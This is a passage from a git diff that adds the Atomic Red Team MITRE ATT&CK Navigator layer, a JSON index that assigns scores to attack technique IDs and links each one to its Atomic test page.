Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index e69de29b..84129699 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View 